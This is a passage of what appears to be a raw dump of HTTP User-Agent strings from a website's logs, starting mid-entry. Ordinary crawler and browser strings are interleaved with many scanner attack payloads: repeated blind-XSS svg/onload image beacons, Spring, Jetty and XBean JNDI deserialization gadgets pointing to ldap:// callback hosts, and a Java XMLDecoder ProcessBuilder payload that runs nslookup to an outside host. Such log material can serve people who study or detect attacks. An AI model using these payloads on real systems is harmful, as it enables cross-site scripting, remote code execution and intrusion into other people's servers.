/\/w301od3z7uo8ens06o9ynz369xfodc53tygo4d\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527857805-0 +WordPress/4.8; https://www.publiturishotelaria.pt +Mozilla/6.0 (Macintosh; U; Amiga-AWeb) Safari 2.9 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529967113-0 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler ip-10-186-30-41@moz.com) +Mechanize/2.7.5 Ruby/2.4.1p111 (http://github.com/sparklemotion/mechanize/) +WhatsApp/2.18.172 A +WordPress/4.9.1; https://www.spottedbylocals.com/lisbon +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529030762-0 +Apache-HttpClient/4.5.5 (Java/1.8.0_72) +WhatsApp/2.18.146 A +<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://2ehth84z1bf6l34j7asi0mraw12v3quej.b.inty.io/</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://2ehth84z1bf6l34j7asi0mraw12v3quej.b.inty.io/</shareable-resource></bean-factory></x> +WordPress/4.7.9; http://isiszimmerman.com +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1pr6aip4tzad0se5stv394pbv21xppgdb01oq\.b.inty.io/).replace(/\\/g,[]))//'> +Apache-HttpClient/4.4.1 (Java/1.8.0_152) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528908540-0 +WhatsApp/2.17.214 W +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529967111-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534179382-0 +Mozilla/4.0 (compatible; Vagabondo/4.0/EU; http://www.wise-guys.nl/) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180301.130330 +curl/7.24.0 (amd64-portbld-freebsd8.4) libcurl/7.24.0 OpenSSL/0.9.8y zlib/1.2.3 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524087437-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528155214-0 +<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://huf8xnkehqvl1ikynp8xg17pcgi9h4is7.b.inty.io/</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://huf8xnkehqvl1ikynp8xg17pcgi9h4is7.b.inty.io/</shareable-resource></bean-factory></x> +WordPress.com; http://lescorpsdansants.com +WhatsApp/2.17.351 Android/4.1.2 Device/samsung-GT-S7392L +WhatsApp/2.18.247 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xyz2jey02vj99on11p4zi0y74yav1jtah54vsk\.b.inty.io/).replace(/\\/g,[]))//'> +NaverMailApp/2.1.19 (Android 4.4.2; SHV-E250K) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525524220-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/txumg1t9kg9zaaw12tfsm4robfhdb13srned22\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 734; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; SE 2.X MetaSr 1.0) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528122063-0 +[!!org.eclipse.jetty.plus.jndi.Resource ["__/obj", !!javax.naming.Reference ["foo", "Freddy", "http://rc7ifx2oz0dvjs285zq7ybpzuq0i09qxf.b.inty.io/"]], !!org.eclipse.jetty.plus.jndi.Resource ["obj/test", !!java.lang.Object []]] +curl/7.16.3 (amd64-portbld-freebsd7.0) libcurl/7.16.3 OpenSSL/0.9.8e zlib/1.2.3 +set: ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://58bwbby2ve99f6ym1dmlupldq4wxvwvkk.b.inty.io/"]] +Mozilla/5.0 SeznamEmailProxy/2.0.233 +WordPress/4.9.1; https://numeraura.com +WordPress/4.5.14; http://wapit.eu +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180615.160630 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/yz1ri6vemlb4cfy64yhxo9ttdkjck0cr0mncb1\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527514114-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605175-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 PTST/180706.150711 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528813268-0 +WordPress/x.x.x.x PHP/4.x.xx +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534522858-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536686679-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/f9pkuw9iddurk6yjc7fhti9pfgled25ttoge43\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1528794827-2 +AppEngine-Google; ( http://code.google.com/appengine; appid: s~aniview-adstxt) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.1; SM-J120G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536321861-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530022597-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532276215-0 +WhatsApp/2.17.421 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/x862te80cvt9jox1bpezs087eyk1opgg4br1fq\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528878672-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/c3g5mkzsqzfigt2k8clbsnx7hynrdf56t1gr4g\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533064971-0 +WordPress/4.8.3; http://cast-in.pt/website +okhttp/3.11.0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536091222-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/troycarwvrc52kgxulxvbwr3xu3m2au1iw5mtb\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; InfoPath.2; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Freddy", "http://oogfruelbxpsvpe5hw24a81w6nci4hs6.b.inty.io/"], !!org.apache.xbean.naming.context.WritableContext []]] +WordPress/4.9.1; http://www.spottedbylocals.com/lisbon +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/v3zom3zbqif1gc238vlus6xqhhnkj8bzzumka9\.b.inty.io/).replace(/\\/g,[]))//'> +Test Crawler/Nutch-1.12 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/alzf6rldp86mw1aeo2rc5dlkrbxf13tuhp4fs4\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 681; .NET CLR 1.1.4322; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0) +WhatsApp/2.18.11 A +WhatsApp/2.18.86 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/180331.020314 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 1.1.4322) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536321853-0 +WordPress/4.9.8; http://euspr.org +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605176-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531992332-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 5.1.1; SM-J111F ) U2/1.0.0 Mobile +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 708; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) +WordPress/4.9.4; http://vidaportugal.com.br +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/hm7m7ymkqf7tx8blp9sj6kmrsiy9vxnobjy9my\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525679633-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7qy09fmndu2d3opfv786fik24tale960uvhl5a\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536318269-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1532903459-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/3678rk66a1rfhuv79vc5q66dc4i29q1hpcc20r\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.5; http://checkinprice.com +curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 +WordPress/4.9.2; http://financialreports.blogrance.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533007227-0 +python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2 +WhatsApp/2.18.56 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/s70xs97vbqs4ijwwakdurv72dtjthh98x3kt8i\.b.inty.io/).replace(/\\/g,[]))//'> +LinkWalker/3.0 (http://www.brandprotect.com) +WordPress/4.9.7; https://projectlisboa.com +WordPress/4.9.1; https://o-tuga.com +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/go8l9xojse9sz7dkr8ui8joquh0ls9k08vvlja\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xdeqw59d0kp3qec5ixvw287srjxlt9l09vwlka\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.2; https://www.acoesdaeuronext.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524581746-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/4pu9alp7t2ag0ve8swv697pev51zynqee91zpo\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/j2mclryzp6epf01r7jkiruweg5m4lsdj1eo4ct\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36 PTST/180308.150325 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525524225-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/w1ypk4xcojd2ed046wjvq7vrfilniba2yxln9c\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/0.2.8503 N +WhatsApp/2.18.179 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533576671-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/zkn45gk2ox5bvq93nrq142k9q0w0ksbg63wrl\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.8; https://emprestimofacil.net +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/j9tou09mdhuvkayncbfltm9tfkllo9g04vrlfa\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.6; http://agenteremax.com +WordPress/4.9.2; http://www.euprecisoviajar.com +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.19035) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/r7zws87ubps3iiwvajdtru71dsjvjjbaz5mvak\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/uzxni2vamhb0cby24uhto5tpdgj9ixaoyjl99y\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.229 A +WordPress/4.9.8; http://lanafacil.com +Apache-HttpClient/4.5.5 (Java/1.8.0_121) +WordPress/4.7.3; http://csavarkulcs.eu +WordPress/4.9.2; http://my-job.com.ua +["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://w96nc2ztw5a0gxzd24ncvgm4rvxowkv8k.b.inty.io/"]}],"adviceBeanName":"ldap://w96nc2ztw5a0gxzd24ncvgm4rvxowkv8k.b.inty.io/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]] +Curl/PHP 5.6.37 (http://github.com/shuber/curl) +WhatsApp/2.18.155 A +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 691; .NET CLR 2.0.50727) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530302190-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/w411pd4z8up8fnt07oayoz46axgvcj4as5fv3k\.b.inty.io/).replace(/\\/g,[]))//'> +HTTPClient/1.0 (2.8.3, ruby 2.4.1 (2017-03-22)) +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.19002) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533281074-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7ks03fgn7uwdxojfp7269ie2yt4yummda8xyln\.b.inty.io/).replace(/\\/g,[]))//'> +Rome Client (http://tinyurl.com/64t5n) Ver: 0.9 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/5ouy7dklbs0b1mndt564dgi02r8o7cz3nyaoyd\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-90@moz.com) +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-70@moz.com) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535620589-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/otlte5trxme04fiswgzqdrtyzp5iy6qxes1ip7\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/unln62jaahz00bm2su5tc5hp1g7d41wskn7dv2\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/s3wxo93v7qo4ejsw6k9unv329tfm6ay1mw9mxb\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528815991-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 707; TencentTraveler 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; {D9D54F49-E51C-445e-92F2-1EE3C2313240}; .NET4.0C; .NET4.0E) +WhatsApp/2.18.21 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171213.181240 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 769; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; Tablet PC 2.0) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180719.150711 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1526461941-2 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/hvgsy9dcx07xr4133c273eguklqdt1ls9nwdk2\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress.com; https://omiaudoleao.wordpress.com +Java/1.8.0_152-snc2 +WordPress/4.9.8; https://www.cultuga.com.br +[!!org.eclipse.jetty.plus.jndi.Resource ["__/obj", !!javax.naming.Reference ["foo", "Freddy", "http://xcdof32uz6d1jy2e55qdyhp5uw0pzo1cq.b.inty.io/"]], !!org.eclipse.jetty.plus.jndi.Resource ["obj/test", !!java.lang.Object []]] +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523888283-0 +GoogleEarth/7.3.0.3832(Windows;Microsoft Windows (6.2.9200.0);pt-PT;kml:2.2;client:Pro;type:default) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529959502-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 769; qdesk 2.4.1266.203; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; SE 2.X MetaSr 1.0) +WordPress/4.9.8; https://bpcc.pt +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530786264-0 +Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PingdomTMS/0.8.5 Safari/534.34 +WhatsApp/2.18.80 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529960489-0 +GigablastOpenSource/1 +GoogleEarth/7.3.1.4507(Windows;Microsoft Windows (6.2.9200.0);sv;kml:2.2;client:Pro;type:default) +WhatsApp/2.17.414 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/0uv5fhu3yyfc5rj4xs02e3ua0160woofcaz0np\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/180111.190127 +WordPress/4.5.13; http://minichi.info +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7muf5tpywwzvodxzvnhsks3ee5kwek6bu6hw5l\.burpcollaborator.net/).replace(/\\/g,[]))//'> +WhatsApp/2.17.412 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/g9qrc8rbbzlw53f2hbg6hdutyk4dv1nsbnydm2\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-327.22.2.el7.x86_64 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/q6xjpy26tdiwj75ybqopv10lkcq9lxdo1jo9cy\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180827.170850 +WhatsApp/2.18.232 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 PTST/180511.180504 +WordPress/4.5.11; http://gerireliderar.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533149667-0 +WhatsApp/2.18.52 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/dzgikuzg3bkpa4oh255fjgzn5ebce06rumhc51\.b.inty.io/).replace(/\\/g,[]))//'> +Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_151) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535734005-0 +WhatsApp/2.18.180 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 PTST/180214.180224 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET4.0C; ImapBox) +WordPress/4.9.1; https://eclipsecorp.us +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 769; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; TheWorld 6) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1526418611-0 +Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko PTST/402 +WordPress/4.9.6; https://www.eurodicas.com.br +WhatsApp/2.17.223 A +python-requests/2.3.0 CPython/2.7.6 Linux/3.13.0-116-generic +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524985951-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/2ehvxaai1pq8rjdaj2w13d8xsoyntbl29xwnkc\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.106 A +WordPress/4.9.5; https://www.eurodicas.com.br +WordPress/4.9.6; http://saindodosufoco.com +WhatsApp/2.18.94 A +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-23@moz.com) +WhatsApp/2.17.329 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/icybvq8yz5oopzbqhiuh1t6dq4w4zsrjfe24qt\.b.inty.io/).replace(/\\/g,[]))//'> +User-Agent Baiduspider +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 PTST/180904.190957 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/69dbun99d4uikxyacyf8t99gf7lygm8dw8jy7n\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9; http://www.bcsdportugal.org +PycURL/7.43.0.2 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527090330-0 +WordPress/4.9.8; https://www.bancalogic.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534798871-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605158-0 +<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_40" class="java.beans.XMLDecoder"><new class="java.lang.ProcessBuilder"><string>nslookup</string><string>zhkqk57w48i3o07ga7vf3ju7zy5s6s3gs.b.inty.io</string><method name="start" /></new></java> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1iku19eh5ou7vih9n1007ccwwn2jz7ryft2jq8\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/hf0aypbx24rnsyepkhxg4s9ct3z84wwnki78vx\.b.inty.io/).replace(/\\/g,[]))//'> +node-superagent/3.8.0 +WordPress/4.9.6; http://villaferia.com +Mozilla/5.0 (compatible; U; AnyEvent-HTTP/2.23; +http://software.schmorp.de/pkg/AnyEvent) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533029978-0 +Apache-HttpClient/4.5.3 (Java/1.8.0_172) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xghqz5cd3ks3tef5lxyw58asuj0l59x0lv8lwa\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.18 A +WordPress/4.8.3; https://www.gotaway.ca +GuzzleHttp/6.3.0 curl/7.51.0 PHP/5.6.31 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/f4kq77ma6ygv02a1cab5ccpstjzcy0qrem1cp1\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/pqjub6qsunb11gftthwrasqzwq2h55xwlr8hw6\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.2; QQDownload 718; .NET CLR 1.1.4322) +WordPress/4.9.4; http://kenobi/www.aurigaspa.com/wordpress +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] 